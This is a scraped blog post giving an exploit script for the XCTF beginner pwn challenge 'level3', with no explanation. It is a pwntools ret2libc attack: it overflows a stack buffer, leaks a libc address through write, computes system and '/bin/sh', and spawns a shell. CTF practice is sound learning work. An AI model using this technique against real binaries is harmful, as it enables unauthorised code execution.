zoukankan      html  css  js  c++  java
  • xctf pwn(新手练习)level3

    xctf pwn level3

    #-*-coding:utf-8-*-
    from pwn import *
    p = process('./level3')
    #p = remote("111.198.29.45","36722")
    elf = ELF('./level3')
    libc = ELF('/lib/i386-linux-gnu/libc.so.6')
    #libc = ELF('./libc_32.so.6')
    write_plt = elf.plt['write']
    print "write_plt: " + hex(write_plt)
    # print hex(elf.symbols['write'])
    write_got = elf.got['__libc_start_main']
    print "write_got: " + hex(write_got)
    libc_main = libc.symbols['__libc_start_main']
    print "write_libc: " + hex(libc_main)
    system_libc = libc.symbols['system']
    print "system_libc: " + hex(system_libc)
    vulnfun = 0x804844B
    # pause()
    #write(1,write_got,4)
    p.recv()
    payload = 140*'a' + p32(write_plt) + p32(vulnfun)
    payload += p32(1) + p32(write_got) + p32(4)
    p.sendline(payload)
    write_addr = u32(p.recv(4))
    print "write_addr: " + hex(write_addr)
    pause()
    offset = write_addr - libc_main
    system_addr = offset + system_libc
    binsh = libc.search("/bin/sh").next()
    binsh_addr = offset + binsh
    print "binsh_addr: " + hex(binsh_addr)
    payload = 140*'a' + p32(system_addr) + p32(vulnfun) + p32(binsh_addr)
    p.sendline(payload)
    p.interactive()
    
  • 相关阅读:
    对话系统综述
    3.738. 单调递增的数字
    3.765-情侣牵手
    2.135-分发糖果
    1.312-戳气球
    4.BN推导
    3.CNN-卷积神经网络推导
    2.DNN-神经网络推导
    联系人
    DS博客作业05--查找
  • 原文地址:https://www.cnblogs.com/xlcm/p/11905751.html
Copyright © 2011-2022 走看看